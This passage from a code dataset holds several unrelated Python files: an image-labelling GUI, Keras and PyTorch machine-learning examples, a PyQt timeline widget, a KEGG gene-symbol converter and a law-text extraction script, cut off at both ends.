self.frame_canvas.load_image(self.frames[self.current_frame_index])\n self.filename_label.config(text=\"Current File: \" + self.frames[self.current_frame_index])\n elif event.char == \"c\":\n self.frame_canvas.clear_labels()\n elif event.char == \"w\":\n global SELECTED_CROSS_HAIR_COLOR_INDEX\n self.frame_canvas.editing = not self.frame_canvas.editing\n cross_hair_color = \"red\" if self.frame_canvas.editing else CROSS_HAIR_COLORS[SELECTED_CROSS_HAIR_COLOR_INDEX]\n self.frame_canvas.itemconfig(self.frame_canvas.horizontal_dash_line, fill=cross_hair_color)\n self.frame_canvas.itemconfig(self.frame_canvas.vertical_dash_line, fill=cross_hair_color)\n self.adding_box_label.config(text=\"Adding boxes: \" + str(not self.frame_canvas.editing))\n elif event.char == \"z\":\n print(\"Deleting last box...\");\n self.frame_canvas.clear_last_label()\n elif event.char == \"r\":\n self.frame_canvas.rollingover_label = not self.frame_canvas.rollingover_label\n self.mode_label.config(text=\"Rolling Labels: \" + 
str(self.frame_canvas.rollingover_label))\n print(\"r pressed rollover is now\", self.frame_canvas.rollingover_label)\n\n\n elif event.char == \"f\":\n SELECTED_CROSS_HAIR_COLOR_INDEX = (SELECTED_CROSS_HAIR_COLOR_INDEX + 1) % len(CROSS_HAIR_COLORS)\n print(\"Changing crosshair to: \" + CROSS_HAIR_COLORS[SELECTED_CROSS_HAIR_COLOR_INDEX]);\n cross_hair_color = \"red\" if self.frame_canvas.editing else CROSS_HAIR_COLORS[SELECTED_CROSS_HAIR_COLOR_INDEX]\n self.frame_canvas.itemconfig(self.frame_canvas.horizontal_dash_line, fill=cross_hair_color)\n self.frame_canvas.itemconfig(self.frame_canvas.vertical_dash_line, fill=cross_hair_color)\n \n else:\n print(\"not selected\", event.char)\n\n def create_menu(self):\n menubar = tk.Menu(self)\n\n fileMenu = tk.Menu(menubar)\n menubar.add_cascade(label=\"File\", underline=0, menu=fileMenu)\n fileMenu.add_command(label=\"Open Directory\", underline=1, command=self.open_frames, accelerator=\"Ctrl+O\")\n\n helpMenu = tk.Menu(menubar, tearoff=False)\n menubar.add_cascade(label=\"Help\", underline=0, menu=helpMenu)\n helpMenu.add_command(label=\"Help\", underline=1, command=self.show_help, accelerator=\"Ctrl+H\")\n helpMenu.add_command(label=\"About\", underline=1, command=self.about_app)\n\n self.config(menu=menubar)\n\n def open_frames(self):\n \"\"\"Options are explained here: http://tkinter.unpythonic.net/wiki/tkFileDialog\"\"\"\n print(\"Opening Frames...\")\n directory_name = tk.filedialog.askdirectory()\n extensions = [\".jpg\",\".png\"]\n if directory_name:\n self.file_path = directory_name\n self.current_frame_index = 0\n self.frames = []\n correct_file_format = True\n for f in os.scandir(self.file_path):\n if f.is_file():\n if os.path.splitext(f.name)[1].lower() in extensions:\n self.frames.append(f.path)\n if len(os.path.splitext(f.name)[0].split(\"_\")[-1]) != 6: #Make sure frames are labeled with 6 digit identifier\n correct_file_format = False\n if not correct_file_format:\n print(\"Warning: Please make sure images frame file name has 6 digit identifier: _.ext\")\n self.frames.sort()\n print('Open and do something with %s' % self.file_path)\n print(\"current images...\\n\", self.frames)\n self.frame_canvas.load_image(self.frames[self.current_frame_index])\n self.filename_label.config(text= \"Current File: \" + self.frames[self.current_frame_index])\n\n def quit_app(self, event):\n sys.exit(0)\n\n def show_help(self):\n print('Go to the github: www.github.com')\n\n def about_app(self):\n about_text = \"Matthew Saponaro\\nmattsap@aiwhoo.com\" + \"\\nVersion \" + str(VERSION) + \"\\nCheck out our website: www.aiwhoo.com\"\n about_dialog = tk.Toplevel(self)\n about_dialog.title('About App')\n about_dialog.bind('', lambda event: about_dialog.destroy())\n about_dialog.bind('', lambda event: about_dialog.destroy())\n App.center_on_screen(about_dialog)\n tk.Message(about_dialog, text=about_text).pack(fill=tk.X, expand=tk.YES)\n button = tk.Button(about_dialog, text='Close', command=about_dialog.destroy).pack()\n\nif __name__ == \"__main__\":\n app = App()\n app.resizable(False, False)\n app.title(\"LabelVision\")\n app.mainloop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"388358016","text":"\"\"\"\"Example usage of DenseTensor layer on MNIST dataset (~0.2% train/2% test error with single layer). 
\"\"\"\nfrom keras.layers import Input\nfrom keras.models import Model\nfrom keras.optimizers import Adam\n\nfrom dense_tensor import DenseTensor, simple_tensor_factorization\nfrom dense_tensor.example_utils import experiment\nfrom dense_tensor.utils import l1l2\n\n\ndef tensor_model(input_dim=28 * 28, output_dim=10, reg=lambda: l1l2(1e-6, 1e-6)):\n \"\"\"\n One layer of a DenseTensor\n \"\"\"\n _x = Input(shape=(input_dim,))\n factorization = simple_tensor_factorization(tensor_regularizer=reg())\n y = DenseTensor(units=output_dim,\n activation='softmax',\n kernel_regularizer=reg(),\n factorization=factorization)\n _y = y(_x)\n m = Model(_x, _y)\n m.compile(Adam(1e-3, decay=1e-4), loss='categorical_crossentropy', metrics=[\"accuracy\"])\n return m\n\n\nif __name__ == \"__main__\":\n path = \"output/dense_tensor\"\n model = tensor_model()\n experiment(path, model)\n","sub_path":"examples/example_tensor.py","file_name":"example_tensor.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"383369185","text":"from PyQt4 import QtGui\n\n\nclass TimelineDelta(object):\n def __init__(self, begin, end=30, title=None, height=30, top=0, parent=None):\n self._top = top\n self._height = height\n self._parent = parent\n self._title = title\n self._lock = False\n if self.track not in parent._tracks_info.keys():\n self._defautcolor = parent._defautcolor\n else:\n self._defautcolor = parent._tracks_info[self.track][1]\n self._begin = begin\n self._end = end\n\n if self.track >= self._parent.numberoftracks:\n self._parent.numberoftracks = self.track + 1\n\n\n ######################################################################################\n #### HELPERS/FUNCTIONS ###############################################################\n ######################################################################################\n\n def collide(self, x, y):\n return self.begin <= x <= self.end and self._top <= y<= (self._top + self._height)\n\n def canSlideBegin(self, x, y):\n return not self._lock and x == int(round(self.begin)) and self._top <= y <= (self._top + self._height)\n\n def canSlideEnd(self, x, y):\n return not self._lock and int(round(self.end)) == x and self._top <= y <= (self._top + self._height)\n\n def moveEnd(self, x):\n \"\"\"Move the right edge of the event rectangle.\"\"\"\n # Do nothing if locked\n if self._lock:\n return\n\n # Do nothing if trying to go over the pther edge\n if self._end <= self._begin - x and x < 0:\n return\n\n # Increment accordingly\n self._end += x / self._parent._scale\n\n # Minimum begin position is at 0\n if self._end > (self._parent.width() / self._parent._scale):\n self._end = (self._parent.width() / self._parent._scale)\n\n def moveBegin(self, x):\n \"\"\"Move the left edge of the event rectangle.\"\"\"\n # Do nothing if locked\n if self._lock:\n return\n\n # Do nothing if trying to go over the other edge\n if self._begin >= self._end - x and x > 0:\n return\n\n # Increment accordingly\n self._begin += x / self._parent._scale\n\n # Minimum begin position is at 0\n if self._begin < 0:\n self._begin = 0\n\n def move(self, x, y):\n if self._lock: return\n if (self.begin + x) >= 0 and (self.end + x) <= self._parent.width():\n self._begin += x / self._parent._scale\n self._end += x / self._parent._scale\n current_track = self.track\n new_track = (y - 20) // 34\n if current_track != new_track and new_track >= 0 and new_track <= self._parent.numberoftracks:\n self.track = 
new_track\n if new_track >= self._parent.numberoftracks: self._parent.numberoftracks += 1\n\n def showEditWindow(self):\n text, ok = QtGui.QInputDialog.getText(self._parent, 'Edit event', 'Comment:', text=self._title)\n if ok: self._title = str(text)\n\n def draw(self, painter, showvalues = False):\n start, end = self.begin, self.end\n if self._lock:\n transparency = 0.1\n else:\n transparency = 0.5\n painter.setPen(QtGui.QColor(0, 0, 0))\n painter.setOpacity(transparency)\n painter.drawRoundedRect(start, self._top, end-start, self._height, 3,3)\n painter.setOpacity(1.0)\n\n painter.drawText(start+3, self._top+19, self._title )\n if showvalues:\n painter.drawText(start, self._top+44, \"[%d;%d] delta:%d\" % (self._begin, self._end, self._end-self._begin))\n\n\n ######################################################################################\n #### PROPERTIES ######################################################################\n ######################################################################################\n\n @property\n def lock(self): return self._lock\n @lock.setter\n def lock(self, value): self._lock = value\n\n @property\n def begin(self): return self._begin*self._parent._scale\n @begin.setter\n def begin(self, value):\n if self._lock: return\n self._begin = value/self._parent._scale\n if self._begin<0: self._begin=0\n\n @property\n def end(self): return self._end*self._parent._scale\n @end.setter\n def end(self, value):\n if self._lock: return\n self._end = value/self._parent._scale\n if self._end>(self._parent.width()/self._parent._scale):\n self._end=(self._parent.width()/self._parent._scale)\n\n @property\n def track(self):\n return (self._top - 20) // 34\n @track.setter\n def track(self, value):\n #FIXME This was preventing assigning a track when importing ingo locked\n # Is it needed?\n # if self._lock: return\n self._top = value * 34 + 20\n\n @property\n def color(self): return self._defautcolor\n @color.setter\n def color(self, value):\n if type(value)==str: self._defautcolor = QtGui.QColor(value)\n else: self._defautcolor = value\n\n # @property\n # def row(self):\n # return [ int(round(self._begin)),\n # int(round(self._end)),\n # self._title,\n # self.track,\n # self._defautcolor.name(),\n # self._lock ]\n\n # @row.setter\n # def row(self, value):\n # self._begin = int(value[0])\n # self._end = int(value[1])\n # self._title = value[2]\n # self.track = int(value[3])\n # self._defautcolor = QtGui.QColor(value[4])\n # self._lock = value[5]=='True'\n\n # if self.track>=self._parent.numberoftracks: self._parent.numberoftracks = self.track+1\n\n\n #TODO redefinition of the property above to write to file in the new format\n # This is a bad idea, better to access these individually\n @property\n def properties(self):\n return [self._lock,\n int(round(self._begin)),\n int(round(self._end)),\n self._title,\n self._defautcolor.name(),\n self.track]\n\n @properties.setter\n def properties(self, value):\n self._lock = value[0]=='True'\n self._begin = int(value[1])\n self._end = int(value[2])\n self._title = value[3]\n self._defautcolor = QtGui.QColor(value[4])\n self.track = int(value[5])\n\n if self.track >= self._parent.numberoftracks:\n self._parent.numberoftracks = self.track + 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pyforms/Controls/ControlEventTimeline/TimelineDelta.py","file_name":"TimelineDelta.py","file_ext":"py","file_size_in_byte":6550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} 
+{"seq_id":"145195208","text":"# -*- coding: utf-8 -*-\n\n#abrindo o arquivo no mesmo diretório\nwith open('file.txt') as file_object:\n\tcontents = file_object.read()\n\tprint(contents)\n\t\n\n# abrindo arquico em outro diretório\nwith open('files/file.txt') as file_object:\n\tcontents = file_object.read()\n\tprint(contents)","sub_path":"Livro-Curso-intensivo-de-PYTHON/cap-10-arquivos-e-excecoes/01_lendo_arquivo.py","file_name":"01_lendo_arquivo.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"251853392","text":"with open(\"fission_yeast_genename_genesymbol.txt\", \"r\") as translate_file:\n foreign_new_id = {}\n translate_file.readline()\n for line in translate_file:\n line = line.strip().split(\"\\t\")\n if len(line) > 1:\n if \"; \" in line[1]:\n line[1] = line[1].split(\"; \")\n for id in line[1]:\n if line[0] not in foreign_new_id:\n foreign_new_id[line[0]] = []\n foreign_new_id[line[0]].append(id)\n else:\n if line[0] not in foreign_new_id:\n foreign_new_id[line[0]] = []\n foreign_new_id[line[0]].append(line[1])\n\nwith open(\"KEGG_Paths2geneIDs\", \"r\") as input_file:\n pathway_gene = {}\n for line in input_file:\n line = line.strip().split(\"\\t\")\n kegg_ids = line[1].split(\" \")\n if line[0] not in pathway_gene:\n pathway_gene[line[0]] = []\n pathway_gene[line[0]] = kegg_ids\n\npathway_genesymbol_list = {}\nfor pathway, gene_list in pathway_gene.items():\n for gene in gene_list:\n if gene in foreign_new_id:\n if pathway not in pathway_genesymbol_list:\n pathway_genesymbol_list[pathway] = []\n pathway_genesymbol_list[pathway].append(foreign_new_id[gene])\n else:\n if pathway not in pathway_genesymbol_list:\n pathway_genesymbol_list[pathway] = []\n pathway_genesymbol_list[pathway].append(foreign_new_id[gene])\n\nwith open(\"fission_yeast_pathway_genesymbol.csv\", \"w\") as output:\n for pathway, genesymbols in pathway_genesymbol_list.items():\n for gs in genesymbols:\n output.write(pathway + \";\" + \",\".join(gs) + \"\\n\")\n\ndef gmt_creator(input_file, sep, output_file):\n parameter_gene = {}\n with open(input_file, \"r\") as input_file:\n for line in input_file:\n line = line.strip().split(sep)\n if line[0] not in parameter_gene:\n parameter_gene[line[0]] = []\n parameter_gene[line[0]].append(line[1])\n with open(output_file, \"w\") as output:\n for parameter in parameter_gene:\n output.write(parameter + \";\" + \",\".join(parameter_gene[parameter]) + \"\\n\")\n\ngmt_creator(\"fission_yeast_pathway_genesymbol.csv\",\";\", \"KEGG_Schizosaccharomyces_pombe_GeneSymbol.gmt\")","sub_path":"KEGG/Schizosaccharomyces pombe/foreignid_to_genesymbol.py","file_name":"foreignid_to_genesymbol.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"271774597","text":"\nimport gym\nfrom tqdm import tqdm\nimport numpy as np\nfrom collections import deque\nimport matplotlib.pyplot as plt\n\nimport torch\ntorch.manual_seed( 0 )\nimport torch.nn as nn\nimport torch.nn.functional as func\nimport torch.optim as optim\nfrom torch.distributions import Categorical\n\nplt.ion()\n\nDEBUG_ANALYZE_GRAPH = True\n# BATCH_SIZE = 10\n\n# create the environment\n_env = gym.make( 'CartPole-v0' )\n## _env = gym.make( 'MountainCar-v0' )\n_env.seed( 0 )\nprint( 'S: ', _env.observation_space )\nprint( 'A: ', _env.action_space )\n\n# initialize pytorch-cuda device\n_device = torch.device( 'cuda:0' if torch.cuda.is_available() 
else 'cpu' )\n\n# define architecture of the policy network\n# MLP with a single hidden layer\n\nclass Policy( nn.Module ) :\n\n def __init__( self, dimInput = 4, dimOutput = 2, dimHidden = 20 ) :\n super( Policy, self ).__init__()\n\n self.fc1 = nn.Linear( dimInput, dimHidden )\n self.fc2 = nn.Linear( dimHidden, dimOutput )\n\n def forward( self, s ) :\n s = func.relu( self.fc1( s ) )\n s = func.softmax( self.fc2( s ), dim = 1 )\n return s\n\n def act( self, s ) :\n # transform state to tensor and send to device\n s = torch.from_numpy( s ).float().unsqueeze( 0 ).to( _device )\n # compute the probabilities p = pi(a|s) for all actions using the policy\n p = self.forward( s ).cpu()\n # grab the action using those probabilities (stochastic)\n pdist = Categorical( p )\n a = pdist.sample()\n\n # return the action (to execute) and the log probability\n return a.item(), pdist.log_prob( a )\n\n_policy = Policy( _env.observation_space.shape[0], \n _env.action_space.n ).to( _device )\n_optimizer = optim.Adam( _policy.parameters(), lr = 1e-2 )\n\n# training with REINFORCE algorithm\ndef reinforce( nEpisodes = 1000, \n nMaxStepsEpisode = 1000,\n gamma = 1.0,\n printEvery = 100 ) :\n \n # for 100 most recent\n _scoresDeque = deque( maxlen = 100 )\n # for all history of scores\n _scoresBuffer = []\n\n for iEpisode in tqdm( range( nEpisodes ) ) :\n _logProbsBuffer = []\n _rewardsBuffer = []\n _state = _env.reset()\n\n # collect m=1 episode\n for _ in range( nMaxStepsEpisode ) :\n # use policy network to get action and log probability\n _action, _logProb = _policy.act( _state )\n _logProbsBuffer.append( _logProb )\n # take a step in the simulation\n _state, _reward, _done, _ = _env.step( _action )\n _rewardsBuffer.append( _reward )\n if _done :\n break\n\n _scoresDeque.append( sum( _rewardsBuffer ) )\n _scoresBuffer.append( sum( _rewardsBuffer ) )\n\n # _npRewards = np.array( _rewardsBuffer )\n # _npRewards = ( _npRewards - np.mean( _npRewards ) ) / ( np.std( _npRewards ) + 0.0000001 )\n _discounts = [ gamma ** i for i in range( len( _rewardsBuffer ) + 1 ) ]\n _R = sum( [ a * b for a, b in zip( _discounts, _rewardsBuffer ) ] )\n\n _policyLoss = []\n for _logProb in _logProbsBuffer :\n # change sign to use SGD (not ascent)\n _policyLoss.append( -_logProb * _R )\n\n # concatenate all losses into tensor and compute the sum of this tensor\n # (garbage collector, I choose you!) just reassign the ref. variable and\n # let gc go its job. The loss is of type tensor (check type<>) so can\n # access the gradient from autograd with backward\n _policyLoss = torch.cat( _policyLoss ).sum()\n\n # do backprop\n _optimizer.zero_grad()\n _policyLoss.backward()\n _optimizer.step()\n\n _meanScore = np.mean( _scoresDeque )\n if iEpisode % printEvery == 0 :\n print( 'Episode {}\\tAverage Score: {:.2f}'.format( iEpisode, _meanScore ) )\n if _meanScore >= 195.0 :\n print( 'Environment solved in {:d} episodes\\tAverage score: {:.2f}'.format( iEpisode, _meanScore ) )\n break\n\n return _scoresBuffer\n\n_scores = reinforce()\n\n# plot the training results\n_fig = plt.figure()\n_ax = _fig.add_subplot( 111 )\nplt.plot( np.arange( 1, len( _scores ) + 1 ), _scores )\nplt.ylabel( 'Score' )\nplt.xlabel( 'Episode #' )\nplt.show()\n\n# test the agent\n_env = gym.make( 'CartPole-v0' )\n## _env = gym.make( 'MountainCar-v0' )\n\nfor _ in range( 5 ) :\n _state = _env.reset()\n for t in range( 10000 ) :\n _action, _ = _policy.act( _state )\n _env.render()\n _state, _reward, _done, _ = _env.step( _action )\n if _done:\n print( 'done! 
t: {:d}'.format( t ) )\n break \n\n_env.close()","sub_path":"rl/pg/reinforce_cartpole_pytorch.py","file_name":"reinforce_cartpole_pytorch.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"404926220","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n\nfrom deepdive import *\nimport re\nimport divlaw\n\n@tsv_extractor\n@returns(lambda\n law_id =\"text\",\n\t\ttotalPart =\"int\",\n \tpart_index =\"int\",\n \t\tpart_start =\"int\",\n \tpart_end =\"int\",\n \tpart_name\t=\"text\"\n :[])\ndef extract(\n id = \"text\",\n content = \"text\"\n ):\n\n\ta = divlaw.divPart(content)\n\ttotalPart = divlaw.getTotalPart(a)\n\tif totalPart > 0:\n\t\tfor i in range(0,totalPart):\n\t\t\tyield [\n\t\t\t\tid,\n\t\t\t\ttotalPart,\n\t\t\t\ti,\n\t\t\t\tdivlaw.getPart(a,i)['start'],\n\t\t\t\tdivlaw.getPart(a,i)['end'],\n\t\t\t\tdivlaw.getPart(a,i)['name'],\n\t\t\t]\n\telse :\n\t\tyield [\n\t\t\tid,\n\t\t\t0,\n\t\t\t0,\n\t\t\tdivlaw.getPart(a,0)['start'],\n\t\t\tdivlaw.getPart(a,0)['end'],\n\t\t\tNone,\n\t\t]","sub_path":"deepdive/udf/extract_parts.py","file_name":"extract_parts.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"240012748","text":"# -*- coding: utf-8 -*-\nimport json\nimport numpy as np\nfrom io import open\nfrom math import ceil\nimport sys\nimport os\nfrom random import shuffle\nfrom nltk import word_tokenize\n\nfrom keras.layers import Dense, Input, GRU, RepeatVector, Masking, Activation, Embedding, Lambda\n#from keras.models import Model, load_model\nfrom nnkeras.engine.training import Model\nimport keras.backend as K\n\n\nimport config\nimport settings\nfrom models.emb_sentence import EmbSentenceEncoder, EmbSentenceDecoder\nimport emb_word\n\ndef loss_func(x):\n enc_words = x[0]\n dec_words = x[1]\n trunc_dec_words = dec_words[:, :x[2][0][0],:]\n return enc_words - trunc_dec_words\n\n\ndef get_data():\n with open(settings.DATA_STORAGE+config.CHARS_FILENAME, \"rt\", encoding=\"utf8\") as f:\n chars = json.load(f)\n total_char_count = np.sum(chars.values())\n chars_decode = [ch for ch in chars.keys()]\n chars_decode.sort()\n chars_encode = {}\n for idx, char in enumerate(chars_decode):\n chars_encode[char] = idx\n with open(settings.DATA_STORAGE+config.SENTENCES_FILENAME, \"rt\", encoding='utf8') as f:\n sentences = f.read().lower().split(\"\\n\")\n sentences = [word_tokenize(s) for s in sentences]\n\n return {\"sentences\": sentences,\n \"chars_encode\": chars_encode,\n \"chars_decode\": chars_decode,\n \"char_count\": len(chars_encode)+2}\n\n\n\ndef prepare_objects(data):\n indexes = range(len(data['sentences']))\n shuffle(indexes)\n train_segment = int(len(indexes)*0.9)\n\n train_indexes = indexes[:train_segment]\n val_indexes = indexes[train_segment:]\n\n model = build_model(data)\n data_gen = build_generator(data, train_indexes)\n val_gen = build_generator(data, val_indexes)\n return {'model': model,\n 'data_gen': data_gen,\n 'val_gen': val_gen,\n 'train_indexes': train_indexes,\n 'val_indexes': val_indexes}\n\n\ndef prepare_data(data, emb_word_encoder):\n result = {}\n buckets = {}\n for sentence in data['sentences']:\n words = word_tokenize(sentence)\n for word in words:\n bucket_size = ceil((len(word)+1.0) / settings.BUCKET_STEP)*settings.BUCKET_STEP\n if bucket_size not in buckets:\n buckets[bucket_size] = set()\n buckets[bucket_size].add(word)\n for bucket_size in buckets.keys():\n words = 
list(buckets[bucket_size])\n words.sort()\n X, Y, sample_weights = emb_word.build_batch(data, words)\n encoded_words = emb_word_encoder.predict(X, sample_weight=sample_weights)\n for idx, word in enumerate(words):\n result[word] = encoded_words[idx]\n return result\n\n\n\n\ndef build_model(data):\n data_input = Input(shape=(settings.MAX_SENTENCE_LEN, settings.MAX_WORD_LEN), dtype=\"int32\")\n bucket_word_size_input = Input(shape=(1,), dtype=\"int32\")\n bucket_sentence_size_input = Input(shape=(1,), dtype=\"int32\")\n encoder = EmbSentenceEncoder(char_units=data[\"char_count\"],\n word_units=settings.WORD_EMB_UNITS,\n sentence_units=settings.SENTENCE_EMB_UNITS,\n l2=settings.L2,\n dropout_w=settings.DROPOUT_W,\n dropout_u=settings.DROPOUT_U,\n batch_size=settings.BATCH_SIZE,\n pretrained=settings.PRETRAINED)([data_input, bucket_word_size_input, bucket_sentence_size_input])\n decoder = EmbSentenceDecoder(max_len_sentence=settings.MAX_SENTENCE_LEN,\n max_len_word=settings.MAX_WORD_LEN,\n char_units=data[\"char_count\"],\n word_units=settings.WORD_EMB_UNITS,\n sentence_units=settings.SENTENCE_EMB_UNITS,\n l2=settings.L2,\n dropout_w=settings.DROPOUT_W,\n dropout_u=settings.DROPOUT_U,\n batch_size=settings.BATCH_SIZE,\n pretrained=settings.PRETRAINED,\n name='decoder')(encoder)\n #enc_dec_layer = Lambda(function=loss_func, name='word_binding')([encoder[1], decoder[1], bucket_sentence_size_input])\n model = Model(inputs=[data_input, bucket_word_size_input, bucket_sentence_size_input], outputs=decoder)\n model.compile(optimizer='adam', loss={'decoder':'categorical_crossentropy'}, sample_weight_dim={'decoder':3}, metrics={'decoder':\"categorical_accuracy\"})\n\n if settings.PRETRAINED:\n emb_word_model = emb_word.build_model(data)\n emb_word_model.load_weights(settings.MODEL_STORAGE+\"emb_word.h5\")\n model.layers[3].embeddings.set_value(K.get_value(emb_word_model.layers[2].embeddings))\n model.layers[3].W_word.set_value(K.get_value(emb_word_model.layers[2].W))\n model.layers[3].U_word.set_value(K.get_value(emb_word_model.layers[2].U))\n model.layers[3].b_word.set_value(K.get_value(emb_word_model.layers[2].b))\n model.layers[3].gammas_word.set_value(K.get_value(emb_word_model.layers[2].gammas))\n model.layers[3].betas_word.set_value(K.get_value(emb_word_model.layers[2].betas))\n model.layers[4].W_word.set_value(K.get_value(emb_word_model.layers[3].W))\n model.layers[4].U_word.set_value(K.get_value(emb_word_model.layers[3].U))\n model.layers[4].b_word.set_value(K.get_value(emb_word_model.layers[3].b))\n model.layers[4].gammas_word.set_value(K.get_value(emb_word_model.layers[3].gammas))\n model.layers[4].betas_word.set_value(K.get_value(emb_word_model.layers[3].betas))\n model.layers[4].W_emb_word.set_value(K.get_value(emb_word_model.layers[3].W_emb))\n model.layers[4].b_emb_word.set_value(K.get_value(emb_word_model.layers[3].b_emb))\n return model\n\ndef build_generator(data, indexes):\n def generator():\n walk_order = list(indexes)\n np.random.shuffle(walk_order)\n buckets = {}\n while True:\n idx = walk_order.pop()-1\n sentence = data['sentences'][idx]\n if len(walk_order) == 0:\n walk_order = list(indexes)\n np.random.shuffle(walk_order)\n if len(sentence) > settings.MAX_SENTENCE_LEN - 1:\n continue\n bucket_size = int(ceil((len(sentence)+1.0) / settings.BUCKET_STEP)*settings.BUCKET_STEP)\n if bucket_size not in buckets:\n buckets[bucket_size] = []\n buckets[bucket_size].append(sentence)\n if len(buckets[bucket_size])==settings.BATCH_SIZE:\n X, Y, sample_weights, word_bucket_size = 
build_batch(data, buckets[bucket_size])\n batch_sentences = buckets[bucket_size]\n buckets[bucket_size] = []\n\n bucket_sentence_size_input = np.zeros((settings.BATCH_SIZE,1), dtype=int)\n bucket_sentence_size_input[0][0]=bucket_size\n\n bucket_word_size_input = np.zeros((settings.BATCH_SIZE,1), dtype=int)\n bucket_word_size_input[0][0]=word_bucket_size\n\n word_binding = np.zeros((settings.BATCH_SIZE, bucket_size, settings.WORD_EMB_UNITS))\n word_binding_weights = np.ones((settings.BATCH_SIZE, bucket_size))\n\n yield [X, bucket_word_size_input, bucket_sentence_size_input], Y, sample_weights, batch_sentences\n return generator()\n\ndef build_batch(data, bucket):\n X = np.zeros((settings.BATCH_SIZE, settings.MAX_SENTENCE_LEN, settings.MAX_WORD_LEN), dtype=\"int32\")\n Y = np.zeros((settings.BATCH_SIZE, settings.MAX_SENTENCE_LEN, settings.MAX_WORD_LEN, data['char_count']))\n sample_weights = np.zeros((settings.BATCH_SIZE, settings.MAX_SENTENCE_LEN, settings.MAX_WORD_LEN))\n word_bucket_size = 0\n for i, sample in enumerate(bucket):\n sentence = sample\n for word_pos in range(len(sentence)):\n word = sentence[word_pos]\n if len(word) > word_bucket_size:\n word_bucket_size = len(word)\n for ch_pos in range(len(word)):\n if word[ch_pos] in data['chars_encode']:\n X[i][word_pos][ch_pos] = data['chars_encode'][word[ch_pos]] + 1\n Y[i][word_pos][ch_pos][data['chars_encode'][word[ch_pos]]] = True\n else:\n X[i][word_pos][ch_pos] = data['char_count']\n Y[i][word_pos][ch_pos][-2] = True\n sample_weights[i][word_pos][ch_pos] = 1\n X[i][word_pos][len(word)] = data['char_count'] - 1\n Y[i][word_pos][len(word)][-1] = True\n sample_weights[i][word_pos][len(word)] = 1\n return X, Y, sample_weights, word_bucket_size\n\n\n\ndef run_training(data, objects):\n model = objects['model']\n epoch_size = int(len(objects['train_indexes'])*1.0/(settings.EPOCH_MULT*settings.BATCH_SIZE))\n val_epoch_size = int(len(objects['val_indexes'])*1.0/(1*settings.BATCH_SIZE))\n sys.stdout.write(\"\\nTrain epoch size = {}; val epoch size = {}\".format(epoch_size, val_epoch_size))\n for epoch in range(settings.EPOCHS):\n sys.stdout.write(\"\\n\\nEpoch {}\\n\".format(epoch+1))\n losses = []\n avg_losses = []\n\n for j in range(epoch_size):\n X, Y, sample_weights, words = next(objects['data_gen'])\n loss = model.train_on_batch(X, Y, sample_weight=sample_weights)\n for idx, loss_value in enumerate(loss):\n if len(losses) == idx:\n losses.append([])\n avg_losses.append(0)\n losses[idx].append(loss_value)\n avg_losses[idx] = np.sum(losses[idx])*1.0/len(losses[idx])\n\n msg = \"\\rTraining batch {} / {}: \".format(j+1, epoch_size)\n msg2 = \", \".join([\"loss{} = {:.4f}\".format(idx, avg_losses[idx]) for idx in range(len(avg_losses))])\n sys.stdout.write(msg+msg2)\n\n losses = []\n avg_losses = []\n sys.stdout.write(\"\\n\")\n for i in range(val_epoch_size):\n X, Y, sample_weights, words = next(objects['val_gen'])\n loss = model.evaluate(X, Y, batch_size=settings.BATCH_SIZE, verbose=0, sample_weight=sample_weights)\n for idx, loss_value in enumerate(loss):\n if len(losses) == idx:\n losses.append([])\n avg_losses.append(0)\n losses[idx].append(loss_value)\n avg_losses[idx] = np.sum(losses[idx])*1.0/len(losses[idx])\n\n msg = \"\\rTesting batch {} / {}: \".format(i+1, epoch_size)\n msg2 = \", \".join([\"loss{} = {:.4f}\".format(idx, avg_losses[idx]) for idx in range(len(avg_losses))])\n sys.stdout.write(msg+msg2)\n\n\ndef train():\n data = get_data()\n objects = prepare_objects(data)\n run_training(data, objects)\n\n\ndef test():\n data 
= get_data()\n objects = prepare_objects(data)\n while True:\n X, Y_true, sample_weights, words_true = next(objects['data_gen'])\n Y_pred = objects['model'].predict(X)\n Y_pred2 = np.argmax(Y_pred, axis=2)\n words_pred = []\n for i in range(settings.BATCH_SIZE):\n word = \"\"\n for j in range(settings.MAX_LEN):\n word_index = Y_pred2[i,j]\n if word_index == data['char_count']-2:\n break\n elif word_index == data['char_count']-1:\n c = \" \"\n else:\n c = data['chars_decode'][word_index]\n word += c\n words_pred.append(word)\n\nif __name__ == \"__main__\":\n train()","sub_path":"scripts/emb_sentence.py","file_name":"emb_sentence.py","file_ext":"py","file_size_in_byte":11621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"66731095","text":"import pickle\r\n\r\n\r\ndef make_data():\r\n global lst\r\n file = open(\"static/binary3.dat\", 'wb')\r\n s = int(input(\"enter the no. of dicitonaries: \"))\r\n lst = []\r\n for i in range(s):\r\n d = {}\r\n n = int(input(\"enter the no. of records: \"))\r\n for j in range(n):\r\n x = input(\"enter the details: \")\r\n y = int(input(\"enter a choice (1-int,2-str): \"))\r\n if y == 1:\r\n g = int(input(\"enter the number: \"))\r\n d[x] = g\r\n else:\r\n h = input(\"enter the word: \")\r\n d[x] = h\r\n k = input(\"do you want to enter more data?(y/n): \")\r\n if k in ['y', 'y']:\r\n op = 1\r\n else:\r\n op = 0\r\n if op == 1:\r\n s = open('static/binary3.dat', 'ab')\r\n x = int(input(\"enter the no. of additions: \"))\r\n for i in range(x):\r\n a = input(\"enter the details: \")\r\n y = int(input(\"enter a choice (1-int,2-str): \"))\r\n if y == 1:\r\n x = int(input(\"enter the number: \"))\r\n d[a] = x\r\n else:\r\n y = input(\"enter the word: 